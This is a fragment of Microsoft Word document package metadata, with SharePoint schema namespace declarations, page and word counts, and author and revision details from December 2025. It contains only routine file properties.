  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="67a6e028-943b-4364-ac68-20d5febdc9aa" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="4a65923210245ff46bd1079e7fc38170" ns3:_="">
    <xsd:import namespace="67a6e028-943b-4364-ac68-20d5febdc9a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6e028-943b-4364-ac68-20d5febdc9a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9D6789-EFBC-4C5B-B0F0-70364C2F71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7B8C18-7E51-4229-963B-31EFFE3292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a6e028-943b-4364-ac68-20d5febdc9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D428AF-0617-4728-A5C3-12B454E9D81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14</Pages>
  <Words>1480</Words>
  <Characters>8900</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>494</Lines>
  <Paragraphs>415</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Shimani Alfred Tlokotsi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Shimani Alfred Tlokotsi</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-04T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-07T01:08:00Z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0x0101002B2E7833B52A1B4C89F555FDF77310DB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2025-12-04T12:18:02Z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7eebd6a7-3a06-4b77-a51a-c46a24f01a02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